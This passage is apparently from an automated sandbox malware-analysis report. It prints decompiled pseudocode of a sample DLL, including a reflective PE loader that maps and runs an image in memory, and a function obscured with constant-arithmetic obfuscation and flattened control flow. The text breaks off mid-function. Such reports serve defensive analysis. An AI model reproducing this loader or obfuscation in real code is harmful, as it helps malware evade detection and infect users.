                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 2ce991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 
1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                    				void* _v8;
                                                                                                                                    				void* _v12;
                                                                                                                                    				signed short* _v16;
                                                                                                                                    				void* _v20;
                                                                                                                                    				void* _v24;
                                                                                                                                    				long _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				intOrPtr _v64;
                                                                                                                                    				char _v68;
                                                                                                                                    				void* _v72;
                                                                                                                                    				intOrPtr _v76;
                                                                                                                                    				intOrPtr* _v80;
                                                                                                                                    				intOrPtr _v84;
                                                                                                                                    				void* _v88;
                                                                                                                                    				intOrPtr _v92;
                                                                                                                                    				intOrPtr _v96;
                                                                                                                                    				intOrPtr _v100;
                                                                                                                                    				void* _t180;
                                                                                                                                    				void* _t191;
                                                                                                                                    				void* _t198;
                                                                                                                                    				void* _t202;
                                                                                                                                    				intOrPtr _t209;
                                                                                                                                    				void* _t220;
                                                                                                                                    				intOrPtr _t269;
                                                                                                                                    				intOrPtr _t278;
                                                                                                                                    				intOrPtr _t326;
                                                                                                                                    
                                                                                                                                    				_v100 = __ecx;
                                                                                                                                    				_v72 = 0;
                                                                                                                                    				_v20 = 0;
                                                                                                                                    				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                                    					_v16 = _a4;
                                                                                                                                    					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                    						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                    						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                                    							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                    							_v80 = _a4 +  *_t15;
                                                                                                                                    							if( *_v80 == 0x4550) {
                                                                                                                                    								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                    									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                                    										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                    										_v32 =  *(_v80 + 0x38);
                                                                                                                                    										_v12 = 0;
                                                                                                                                    										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                                    											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                                    												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                                    											} else {
                                                                                                                                    												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                                    											}
                                                                                                                                    											if(_v88 > _v20) {
                                                                                                                                    												_v20 = _v88;
                                                                                                                                    											}
                                                                                                                                    											_v12 = _v12 + 1;
                                                                                                                                    											_v84 = _v84 + 0x28;
                                                                                                                                    										}
                                                                                                                                    										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                                    										_t59 = _v64 - 1; // 0x71
                                                                                                                                    										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                                    										_t65 = _v64 - 1; // -1
                                                                                                                                    										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                                    											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                                    											_v24 = _t180;
                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                    												L26:
                                                                                                                                    												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                    												if(_v72 != 0) {
                                                                                                                                    													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                                    													asm("sbb edx, edx");
                                                                                                                                    													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                                    													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                                    													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                                    													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                                    													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                                    													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                                    													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                                    														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                                    														_v8 = _t191;
                                                                                                                                    														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                                    														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                                    														 *_v72 = _v8 +  *_t115;
                                                                                                                                    														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                                    														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                                    														if(_t198 != 0) {
                                                                                                                                    															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                                    															_v76 = _t269;
                                                                                                                                    															if(_t269 == 0) {
                                                                                                                                    																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                                    															} else {
                                                                                                                                    																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                                    															}
                                                                                                                                    															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                                    																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                                    																if(_t202 != 0) {
                                                                                                                                    																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                                    																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                                    																			 *(_v72 + 0x2c) = 0;
                                                                                                                                    																			L49:
                                                                                                                                    																			return _v72;
                                                                                                                                    																		}
                                                                                                                                    																		if( *(_v72 + 0x14) == 0) {
                                                                                                                                    																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                    																			L47:
                                                                                                                                    																			goto L49;
                                                                                                                                    																		}
                                                                                                                                    																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                    																		_t209 =  *0x10055a88; // 0x0
                                                                                                                                    																		_t278 =  *0x10055a84; // 0x1
                                                                                                                                    																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                                    																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                                    																		if(_v92 != 0) {
                                                                                                                                    																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                                    																			goto L47;
                                                                                                                                    																		}
                                                                                                                                    																		SetLastError(0x45a);
                                                                                                                                    																		L50:
                                                                                                                                    																		E10002840(_v100, _v72);
                                                                                                                                    																		return 0;
                                                                                                                                    																	}
                                                                                                                                    																	goto L50;
                                                                                                                                    																}
                                                                                                                                    																goto L50;
                                                                                                                                    															}
                                                                                                                                    															goto L50;
                                                                                                                                    														}
                                                                                                                                    														goto L50;
                                                                                                                                    													}
                                                                                                                                    													goto L50;
                                                                                                                                    												}
                                                                                                                                    												VirtualFree(_v24, 0, 0x8000);
                                                                                                                                    												SetLastError(0xe);
                                                                                                                                    												return 0;
                                                                                                                                    											}
                                                                                                                                    											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                                    											_v24 = _t220;
                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                    												goto L26;
                                                                                                                                    											}
                                                                                                                                    											SetLastError(0xe);
                                                                                                                                    											return 0;
                                                                                                                                    										}
                                                                                                                                    										SetLastError(0xc1);
                                                                                                                                    										return 0;
                                                                                                                                    									}
                                                                                                                                    									SetLastError(0xc1);
                                                                                                                                    									return 0;
                                                                                                                                    								}
                                                                                                                                    								SetLastError(0xc1);
                                                                                                                                    								return 0;
                                                                                                                                    							}
                                                                                                                                    							SetLastError(0xc1);
                                                                                                                                    							return 0;
                                                                                                                                    						}
                                                                                                                                    						return 0;
                                                                                                                                    					}
                                                                                                                                    					SetLastError(0xc1);
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				return 0;
                                                                                                                                    			}





























                                                                                                                                    0x1000255a
                                                                                                                                    0x10002564
                                                                                                                                    0x1000257a
                                                                                                                                    0x10002581
                                                                                                                                    0x10002598
                                                                                                                                    0x1000259b
                                                                                                                                    0x1000259e
                                                                                                                                    0x100025bb
                                                                                                                                    0x100025a0
                                                                                                                                    0x100025b3
                                                                                                                                    0x100025b3
                                                                                                                                    0x100025d0
                                                                                                                                    0x100025e3
                                                                                                                                    0x100025ea
                                                                                                                                    0x10002604
                                                                                                                                    0x10002616
                                                                                                                                    0x10002680
                                                                                                                                    0x10002687
                                                                                                                                    0x00000000
                                                                                                                                    0x10002687
                                                                                                                                    0x1000261f
                                                                                                                                    0x10002678
                                                                                                                                    0x1000267b
                                                                                                                                    0x00000000
                                                                                                                                    0x1000267b
                                                                                                                                    0x1000262c
                                                                                                                                    0x1000262f
                                                                                                                                    0x10002635
                                                                                                                                    0x1000263c
                                                                                                                                    0x10002646
                                                                                                                                    0x1000264d
                                                                                                                                    0x10002661
                                                                                                                                    0x00000000
                                                                                                                                    0x10002661
                                                                                                                                    0x10002654
                                                                                                                                    0x1000268c
                                                                                                                                    0x10002693
                                                                                                                                    0x00000000
                                                                                                                                    0x10002698
                                                                                                                                    0x00000000
                                                                                                                                    0x10002606
                                                                                                                                    0x00000000
                                                                                                                                    0x100025ec
                                                                                                                                    0x00000000
                                                                                                                                    0x100025d2
                                                                                                                                    0x00000000
                                                                                                                                    0x10002583
                                                                                                                                    0x00000000
                                                                                                                                    0x10002512
                                                                                                                                    0x10002497
                                                                                                                                    0x1000249f
                                                                                                                                    0x00000000
                                                                                                                                    0x100024a5
                                                                                                                                    0x10002454
                                                                                                                                    0x1000245a
                                                                                                                                    0x10002461
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002465
                                                                                                                                    0x00000000
                                                                                                                                    0x1000246b
                                                                                                                                    0x10002419
                                                                                                                                    0x00000000
                                                                                                                                    0x1000241f
                                                                                                                                    0x10002353
                                                                                                                                    0x00000000
                                                                                                                                    0x10002359
                                                                                                                                    0x10002336
                                                                                                                                    0x00000000
                                                                                                                                    0x1000233c
                                                                                                                                    0x10002315
                                                                                                                                    0x00000000
                                                                                                                                    0x1000231b
                                                                                                                                    0x00000000
                                                                                                                                    0x100022f2
                                                                                                                                    0x100022c8
                                                                                                                                    0x00000000
                                                                                                                                    0x100022ce
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    [Figure: control-flow graph beginning at block 2cf8fd-2cfddc; legend: Executed / Not Executed]
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E002CF8FD() {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				signed int _v1564;
                                                                                                                                    				signed int _v1568;
                                                                                                                                    				signed int _v1572;
                                                                                                                                    				signed int _v1576;
                                                                                                                                    				signed int _v1580;
                                                                                                                                    				signed int _v1584;
                                                                                                                                    				signed int _v1588;
                                                                                                                                    				signed int _v1592;
                                                                                                                                    				signed int _v1596;
                                                                                                                                    				signed int _v1600;
                                                                                                                                    				signed int _v1604;
                                                                                                                                    				signed int _v1608;
                                                                                                                                    				signed int _v1612;
                                                                                                                                    				signed int _v1616;
                                                                                                                                    				signed int _v1620;
                                                                                                                                    				signed int _v1624;
                                                                                                                                    				signed int _v1628;
                                                                                                                                    				signed int _v1632;
                                                                                                                                    				signed int _v1636;
                                                                                                                                    				signed int _v1640;
                                                                                                                                    				signed int _v1644;
                                                                                                                                    				signed int _v1648;
                                                                                                                                    				signed int _v1652;
                                                                                                                                    				signed int _v1656;
                                                                                                                                    				signed int _v1660;
                                                                                                                                    				signed int _v1664;
                                                                                                                                    				signed int _v1668;
                                                                                                                                    				signed int _v1672;
                                                                                                                                    				signed int _v1676;
                                                                                                                                    				signed int _v1680;
                                                                                                                                    				signed int _v1684;
                                                                                                                                    				signed int _v1688;
                                                                                                                                    				signed int _v1692;
                                                                                                                                    				signed int _v1696;
                                                                                                                                    				signed int _v1700;
                                                                                                                                    				signed short* _t368;
                                                                                                                                    				signed int _t381;
                                                                                                                                    				signed int* _t383;
                                                                                                                                    				signed int _t385;
                                                                                                                                    				signed int _t386;
                                                                                                                                    				signed int _t387;
                                                                                                                                    				signed int _t388;
                                                                                                                                    				signed int _t389;
                                                                                                                                    				signed int _t390;
                                                                                                                                    				signed int _t391;
                                                                                                                                    				signed int _t392;
                                                                                                                                    				signed int _t393;
                                                                                                                                    				signed int _t394;
                                                                                                                                    				signed int _t395;
                                                                                                                                    				signed int _t405;
                                                                                                                                    				signed int* _t438;
                                                                                                                                    				void* _t439;
                                                                                                                                    				signed short* _t445;
                                                                                                                                    				signed int* _t446;
                                                                                                                                    
                                                                                                                                    				_t446 =  &_v1700;
                                                                                                                                    				_v1636 = 0x636551;
                                                                                                                                    				_t2 =  &_v1636; // 0x636551
                                                                                                                                    				_t385 = 0x5e;
                                                                                                                                    				_v1636 =  *_t2 / _t385;
                                                                                                                                    				_t383 = 0;
                                                                                                                                    				_t386 = 0x7a;
                                                                                                                                    				_t439 = 0x12dab9f;
                                                                                                                                    				_v1636 = _v1636 * 0x55;
                                                                                                                                    				_v1636 = _v1636 ^ 0x0059e0ec;
                                                                                                                                    				_v1616 = 0x84ec4b;
                                                                                                                                    				_v1616 = _v1616 + 0xffff958e;
                                                                                                                                    				_v1616 = _v1616 << 6;
                                                                                                                                    				_v1616 = _v1616 ^ 0x212f9cfc;
                                                                                                                                    				_v1624 = 0x57c2af;
                                                                                                                                    				_v1624 = _v1624 / _t386;
                                                                                                                                    				_v1624 = _v1624 >> 0xa;
                                                                                                                                    				_v1624 = _v1624 ^ 0x000a9340;
                                                                                                                                    				_v1676 = 0x94d6a3;
                                                                                                                                    				_v1676 = _v1676 >> 3;
                                                                                                                                    				_t387 = 0x41;
                                                                                                                                    				_v1676 = _v1676 * 0x79;
                                                                                                                                    				_v1676 = _v1676 * 0x68;
                                                                                                                                    				_v1676 = _v1676 ^ 0x9280c2f7;
                                                                                                                                    				_v1644 = 0x578290;
                                                                                                                                    				_v1644 = _v1644 | 0x80e552f7;
                                                                                                                                    				_v1644 = _v1644 + 0xffffd80b;
                                                                                                                                    				_v1644 = _v1644 ^ 0x80feae5e;
                                                                                                                                    				_v1652 = 0x70c956;
                                                                                                                                    				_v1652 = _v1652 ^ 0x31ba76f8;
                                                                                                                                    				_v1652 = _v1652 ^ 0x87f2510e;
                                                                                                                                    				_v1652 = _v1652 ^ 0xb63594c0;
                                                                                                                                    				_v1696 = 0x39dcdb;
                                                                                                                                    				_v1696 = _v1696 * 0x22;
                                                                                                                                    				_v1696 = _v1696 >> 0xf;
                                                                                                                                    				_v1696 = _v1696 * 0x75;
                                                                                                                                    				_v1696 = _v1696 ^ 0x000247c6;
                                                                                                                                    				_v1572 = 0x793846;
                                                                                                                                    				_v1572 = _v1572 + 0xfc60;
                                                                                                                                    				_v1572 = _v1572 ^ 0x007fa213;
                                                                                                                                    				_v1576 = 0x3629f6;
                                                                                                                                    				_v1576 = _v1576 | 0x7f6cc17b;
                                                                                                                                    				_v1576 = _v1576 ^ 0x7f7c74a2;
                                                                                                                                    				_v1600 = 0x630dc0;
                                                                                                                                    				_v1600 = _v1600 | 0x8a3170d6;
                                                                                                                                    				_v1600 = _v1600 ^ 0x8a7fe201;
                                                                                                                                    				_v1664 = 0xe79625;
                                                                                                                                    				_v1664 = _v1664 * 0x57;
                                                                                                                                    				_v1664 = _v1664 ^ 0xe47ae09a;
                                                                                                                                    				_v1664 = _v1664 + 0xffff598f;
                                                                                                                                    				_v1664 = _v1664 ^ 0xaac0e7d1;
                                                                                                                                    				_v1648 = 0xac147c;
                                                                                                                                    				_v1648 = _v1648 << 4;
                                                                                                                                    				_v1648 = _v1648 / _t387;
                                                                                                                                    				_v1648 = _v1648 ^ 0x00264750;
                                                                                                                                    				_v1588 = 0x745952;
                                                                                                                                    				_t98 =  &_v1588; // 0x745952
                                                                                                                                    				_v1588 =  *_t98 * 0x3a;
                                                                                                                                    				_v1588 = _v1588 ^ 0x1a53f4d8;
                                                                                                                                    				_v1672 = 0x57a21b;
                                                                                                                                    				_t388 = 0x49;
                                                                                                                                    				_v1672 = _v1672 / _t388;
                                                                                                                                    				_t389 = 0x63;
                                                                                                                                    				_v1672 = _v1672 / _t389;
                                                                                                                                    				_v1672 = _v1672 | 0xd6f4ed27;
                                                                                                                                    				_v1672 = _v1672 ^ 0xd6feee0f;
                                                                                                                                    				_v1620 = 0xc904e8;
                                                                                                                                    				_t390 = 0x17;
                                                                                                                                    				_v1620 = _v1620 * 0x6d;
                                                                                                                                    				_v1620 = _v1620 + 0x178d;
                                                                                                                                    				_v1620 = _v1620 ^ 0x5592dda0;
                                                                                                                                    				_v1688 = 0x59d198;
                                                                                                                                    				_v1688 = _v1688 | 0x5938a823;
                                                                                                                                    				_v1688 = _v1688 ^ 0x788d0eee;
                                                                                                                                    				_v1688 = _v1688 + 0xffff1978;
                                                                                                                                    				_v1688 = _v1688 ^ 0x21fe2fab;
                                                                                                                                    				_v1612 = 0xa097a2;
                                                                                                                                    				_v1612 = _v1612 << 9;
                                                                                                                                    				_v1612 = _v1612 / _t390;
                                                                                                                                    				_v1612 = _v1612 ^ 0x02dc2d90;
                                                                                                                                    				_v1700 = 0xb7b4a0;
                                                                                                                                    				_t391 = 0x36;
                                                                                                                                    				_v1700 = _v1700 / _t391;
                                                                                                                                    				_v1700 = _v1700 >> 1;
                                                                                                                                    				_v1700 = _v1700 | 0xee164e4b;
                                                                                                                                    				_v1700 = _v1700 ^ 0xee1e6de5;
                                                                                                                                    				_v1680 = 0xe4ad14;
                                                                                                                                    				_v1680 = _v1680 | 0xe839ddc8;
                                                                                                                                    				_v1680 = _v1680 ^ 0xfe881b96;
                                                                                                                                    				_t392 = 0x42;
                                                                                                                                    				_v1680 = _v1680 * 0x4e;
                                                                                                                                    				_v1680 = _v1680 ^ 0xd7ed2c6e;
                                                                                                                                    				_v1656 = 0xa710a4;
                                                                                                                                    				_v1656 = _v1656 + 0xfffff8f1;
                                                                                                                                    				_v1656 = _v1656 ^ 0xcc5b21c1;
                                                                                                                                    				_v1656 = _v1656 ^ 0xccf98fb8;
                                                                                                                                    				_v1628 = 0x5fc40d;
                                                                                                                                    				_v1628 = _v1628 + 0xb682;
                                                                                                                                    				_v1628 = _v1628 << 6;
                                                                                                                                    				_v1628 = _v1628 ^ 0x181c8c04;
                                                                                                                                    				_v1640 = 0xd7aa78;
                                                                                                                                    				_v1640 = _v1640 + 0x8e1d;
                                                                                                                                    				_v1640 = _v1640 / _t392;
                                                                                                                                    				_v1640 = _v1640 ^ 0x0007a72a;
                                                                                                                                    				_v1580 = 0xbf48f6;
                                                                                                                                    				_t393 = 0x25;
                                                                                                                                    				_v1580 = _v1580 * 0xd;
                                                                                                                                    				_v1580 = _v1580 ^ 0x09b7b49e;
                                                                                                                                    				_v1564 = 0xff195;
                                                                                                                                    				_v1564 = _v1564 + 0x8c1b;
                                                                                                                                    				_v1564 = _v1564 ^ 0x00104e06;
                                                                                                                                    				_v1684 = 0xbf1e83;
                                                                                                                                    				_v1684 = _v1684 / _t393;
                                                                                                                                    				_t394 = 0x77;
                                                                                                                                    				_v1684 = _v1684 / _t394;
                                                                                                                                    				_v1684 = _v1684 + 0xa662;
                                                                                                                                    				_v1684 = _v1684 ^ 0x0006fc0d;
                                                                                                                                    				_v1596 = 0xc39bae;
                                                                                                                                    				_v1596 = _v1596 << 2;
                                                                                                                                    				_v1596 = _v1596 ^ 0x030cfbaf;
                                                                                                                                    				_v1568 = 0x66568e;
                                                                                                                                    				_v1568 = _v1568 | 0x44ac0d6e;
                                                                                                                                    				_v1568 = _v1568 ^ 0x44e9cf2b;
                                                                                                                                    				_v1692 = 0x3d2b27;
                                                                                                                                    				_v1692 = _v1692 + 0x3fae;
                                                                                                                                    				_t395 = 0x71;
                                                                                                                                    				_v1692 = _v1692 / _t395;
                                                                                                                                    				_v1692 = _v1692 + 0xffff1a11;
                                                                                                                                    				_v1692 = _v1692 ^ 0xffffbf57;
                                                                                                                                    				_v1632 = 0xb4dfda;
                                                                                                                                    				_v1632 = _v1632 * 9;
                                                                                                                                    				_v1632 = _v1632 >> 3;
                                                                                                                                    				_v1632 = _v1632 ^ 0x00c4553b;
                                                                                                                                    				_v1584 = 0x206e7a;
                                                                                                                                    				_v1584 = _v1584 << 7;
                                                                                                                                    				_v1584 = _v1584 ^ 0x10371375;
                                                                                                                                    				_v1592 = 0x689459;
                                                                                                                                    				_v1592 = _v1592 + 0xffffb773;
                                                                                                                                    				_v1592 = _v1592 ^ 0x00637077;
                                                                                                                                    				_v1660 = 0x8b14df;
                                                                                                                                    				_v1660 = _v1660 << 0xd;
                                                                                                                                    				_v1660 = _v1660 + 0x9803;
                                                                                                                                    				_v1660 = _v1660 << 0xa;
                                                                                                                                    				_v1660 = _v1660 ^ 0x71eeeb6f;
                                                                                                                                    				_v1608 = 0x8e767e;
                                                                                                                                    				_v1608 = _v1608 | 0xfaf7fbb6;
                                                                                                                                    				_v1608 = _v1608 ^ 0xfaf9bdf5;
                                                                                                                                    				_v1668 = 0xccd677;
                                                                                                                                    				_v1668 = _v1668 * 0x78;
                                                                                                                                    				_v1668 = _v1668 + 0xffff6b3d;
                                                                                                                                    				_v1668 = _v1668 + 0xf0ff;
                                                                                                                                    				_v1668 = _v1668 ^ 0x600a3b9e;
                                                                                                                                    				_v1604 = 0x7c05f9;
                                                                                                                                    				_v1604 = _v1604 + 0xd55a;
                                                                                                                                    				_v1604 = _v1604 ^ 0x007aedaa;
                                                                                                                                    				_t445 = _v1604;
                                                                                                                                    				while(_t439 != 0x12dab9f) {
                                                                                                                                    					if(_t439 == 0x2f8e73a) {
                                                                                                                                    						_push(_v1604);
                                                                                                                                    						_push(_t383);
                                                                                                                                    						_push(_t395);
                                                                                                                                    						_push(_t383);
                                                                                                                                    						_push(_t383);
                                                                                                                                    						_push(_v1668);
                                                                                                                                    						_push(_t445);
                                                                                                                                    						E002CAB87(_v1660, _v1608, __eflags);
                                                                                                                                    						_t383 = 1;
                                                                                                                                    						__eflags = 1;
                                                                                                                                    						L23:
                                                                                                                                    						return _t383;
                                                                                                                                    					}
                                                                                                                                    					if(_t439 == 0x92208ae) {
                                                                                                                                    						_t368 = _t445;
                                                                                                                                    						__eflags =  *_t445 - _t383;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							L18:
                                                                                                                                    							_t439 = 0xeef82b0;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							goto L11;
                                                                                                                                    						}
                                                                                                                                    						do {
                                                                                                                                    							L11:
                                                                                                                                    							__eflags =  *_t368 - 0x2c;
                                                                                                                                    							if( *_t368 != 0x2c) {
                                                                                                                                    								goto L17;
                                                                                                                                    							}
                                                                                                                                    							_t438 =  &_v1560;
                                                                                                                                    							while(1) {
                                                                                                                                    								_t368 =  &(_t368[1]);
                                                                                                                                    								_t405 =  *_t368 & 0x0000ffff;
                                                                                                                                    								__eflags = _t405;
                                                                                                                                    								if(_t405 == 0) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t405 - 0x20;
                                                                                                                                    								if(_t405 == 0x20) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								 *_t438 = _t405;
                                                                                                                                    								_t438 =  &(_t438[0]);
                                                                                                                                    								__eflags = _t438;
                                                                                                                                    							}
                                                                                                                                    							_t395 = 0;
                                                                                                                                    							__eflags = 0;
                                                                                                                                    							 *_t438 = 0;
                                                                                                                                    							L17:
                                                                                                                                    							_t368 =  &(_t368[1]);
                                                                                                                                    							__eflags =  *_t368 - _t383;
                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                    						goto L18;
                                                                                                                                    					}
                                                                                                                                    					if(_t439 == 0x99a67ee) {
                                                                                                                                    						_t445 = E002CF899(_t395);
                                                                                                                                    						_t439 = 0x92208ae;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t439 == 0x9e65a83) {
                                                                                                                                    						_push(_v1612);
                                                                                                                                    						_push(_v1636);
                                                                                                                                    						_push(_v1688);
                                                                                                                                    						_push( &_v520); // executed
                                                                                                                                    						E002D46BB(_v1672, _v1620); // executed
